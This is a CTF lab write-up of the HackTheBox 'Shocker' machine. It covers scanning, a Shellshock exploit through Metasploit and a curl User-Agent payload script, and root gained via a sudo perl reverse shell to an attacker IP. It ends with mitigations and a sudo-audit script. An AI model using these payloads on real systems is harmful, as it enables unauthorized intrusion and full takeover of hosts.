HackTheBox 'Shocker' writeup
Getting Shells on Shocker
A Quick HackTheBox (HTB) writeup on ‘shocker’
Preface
Unfortunately, it looks like the first time I ran through this box, I got frustrated trying to get the exploit to work manually, so I ended up being lazy and falling back on metasploit. I will go ahead and publish the writeup with my use of msf, but if I find my notes on how I did it manually, or run through it again, I will update this writeup.
Host Information

Hostname | Operating System | HTB Difficulty Rating
---|---|---
Shocker | Linux | Easy
enumeration
nmap
sudo nmap -sS -sV -O -oA shocker 10.10.10.56
[sudo] password for initinfosec:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-23 10:47 CST
Nmap scan report for 10.10.10.56
Host is up (0.044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/23%OT=80%CT=1%CU=31276%PV=Y%DS=2%DC=I%G=Y%TM=5E00EF
OS:D2%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M
OS:54DST11NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71
OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds
Based on the banners from Apache (2.4.18) and OpenSSH (7.2p2 4ubuntu2.2), and after some Googling on the versions nmap reported, it's likely that this system is Ubuntu Xenial (16.04), which ships exactly those packages.
further enumeration with dirb
Noticing port 80 is open, I run dirb against the site:
dirb http://10.10.10.56 -o shocker_dirb_results.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: shocker_dirb_results.txt
START_TIME: Mon Dec 23 10:50:11 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)
-----------------
END_TIME: Mon Dec 23 10:53:52 2019
DOWNLOADED: 4612 - FOUND: 3
cgi-bin and server-status both return 403, so I did not have access to them. index.html, as expected, is the home page: just an image that says don't bug me, with nothing hidden in the source, so it appears to be a dead end.
Since cgi-bin often houses scripts that Apache hands off to an interpreter on the OS, I'll run dirb again against that directory, this time appending the .sh and .pl extensions to look for script files reachable through that URI:
dirb http://10.10.10.56/cgi-bin/ -X .sh,.pl -o dirb_cgi-bin.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_cgi-bin.txt
START_TIME: Mon Dec 23 15:29:06 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.pl) | (.sh)(.pl) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:119)
-----------------
END_TIME: Mon Dec 23 15:36:19 2019
DOWNLOADED: 9224 - FOUND: 1
Viewing the one file that was found, user.sh, we see the following:
cat user.sh
Content-Type: text/plain
Just an uptime test script
16:39:27 up 50 min, 0 users, load average: 0.00, 0.00, 0.00
exploitation of shellshock via metasploit
Using the shellshock exploit module in msf (multi/http/apache_mod_cgi_bash_env_exec), I set the following:
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
I get a user shell:
meterpreter > shell
Process 11628 created.
Channel 1 created.
whoami
shelly
ls -ltr
total 4
-rwxr-xr-x 1 root root 113 Sep 22 2017 user.sh
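Before moving on to privilege escalation, here is the manual equivalent of what the msf module does, as an added example that is not from the original writeup (the author's manual notes were lost, per the preface). mod_cgi exports request headers to the CGI process as HTTP_* environment variables, and a bash vulnerable to CVE-2014-6271 executes whatever follows an exported function definition while importing it. The local check uses the well-known test string; the remote probe assumes a target URL supplied by the caller and is not executed here.

```sh
#!/bin/sh
# Added example, not from the original writeup: the manual equivalent of the
# msf apache_mod_cgi_bash_env_exec module. The target URL is an assumption
# passed in by the caller; nothing here contacts the network unless asked to.

# Local check: does this host's bash still execute code smuggled in after an
# exported function definition? A vulnerable bash runs the trailing "echo"
# while importing x from the environment; a patched one treats x as a string.
shellshock_local_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return; }
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'true' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Build the header value for a CGI probe. The injected commands print a valid
# CGI header block first, so Apache returns the command output in the body
# instead of a 500 "malformed header from script" error.
shellshock_payload() {
    printf '() { :; }; echo Content-Type: text/plain; echo; %s' "$1"
}

# Remote probe: inject the payload through User-Agent (the header the msf
# module also uses by default). Use absolute paths in the command, since the
# CGI environment may not carry a useful PATH.
shellshock_probe() {
    url=$1
    cmd=${2:-/usr/bin/id}
    curl -s -A "$(shellshock_payload "$cmd")" "$url"
}

# Usage (not run here):
#   shellshock_local_check
#   shellshock_probe http://10.10.10.56/cgi-bin/user.sh /usr/bin/id
```

If the probe returns the output of `id` instead of the uptime text, the script is exploitable and the same header can carry a reverse shell command in place of `/usr/bin/id`.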
running sudo -l
I see that I can run perl as root via sudo without a password (NOPASSWD).
I will pass a perl command to try and spawn a reverse shell and try to gain a foothold in the system. (I grabbed this from pentestmonkey’s reverse shell cheat sheet):
sudo perl -e 'use Socket;$i="10.10.14.50";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
I start a listener on port 1234, and I catch the shell:
sudo nc -lvp 1234
Connection from 10.10.10.56:48374
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Awesome, the shellshock foothold combined with the passwordless sudo perl gave us 'one-shot' root level access. From here we can grab both the user and root flags from their respective home directories.
Potential mitigations
- Patch bash on the Linux server so it is no longer vulnerable to ShellShock (CVE-2014-6271)
- If possible, narrow down the amount of information httpd and OpenSSH give out externally via banner grab (an excess of banner/version information makes it easier for an attacker to better tailor attacks)
- Avoid blanket sudo NOPASSWD rules for interpreters like perl; restrict the rule to the specific script that actually needs root, if one is needed at all.
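To make the last mitigation concrete, here is an added example (not from the original writeup) that audits `sudo -l` output for NOPASSWD rules granting an interpreter, editor or `ALL`, which is exactly the misconfiguration that turned the shelly shell into root above. The list of shell-escape binaries and the remediation path in the comments are assumptions; extend them for your environment.

```sh
#!/bin/sh
# Added example, not from the original writeup: flag NOPASSWD sudo rules that
# hand out an interpreter or editor. ESCAPE_BINS is an assumed starting list
# of binaries that can spawn a shell or run arbitrary code; extend as needed.
ESCAPE_BINS="perl python python2 python3 ruby lua node vim vi nano less more awk find env bash sh"

# Reads `sudo -l` style lines on stdin and prints one RISKY line per rule that
# either grants ALL or names a binary from ESCAPE_BINS. Only the first command
# of a comma-separated rule list is examined.
audit_sudo_nopasswd() {
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        cmd=${line##*NOPASSWD: }   # "/usr/bin/perl" or "ALL"
        cmd=${cmd%%,*}             # first command only
        cmd=${cmd%% *}             # drop any arguments
        if [ "$cmd" = "ALL" ]; then
            echo "RISKY: ALL (unrestricted)"
            continue
        fi
        base=${cmd##*/}
        for b in $ESCAPE_BINS; do
            if [ "$base" = "$b" ]; then
                echo "RISKY: $cmd ($base can spawn a shell)"
                break
            fi
        done
    done
}

# Remediation sketch for the rule found on this box (hypothetical script path):
# replace
#   shelly ALL=(root) NOPASSWD: /usr/bin/perl
# with a rule naming the one script that actually needs root, e.g.
#   shelly ALL=(root) NOPASSWD: /usr/local/bin/uptime-report
# and validate the file with `visudo -c -f <file>` before installing it.
#
# Usage (not run here): sudo -l | audit_sudo_nopasswd
```

Run it as the low-privilege user you landed as; any RISKY line is a one-command path to root and should be the first thing fixed.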
That’s it for this box, thanks again, hope it was useful.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!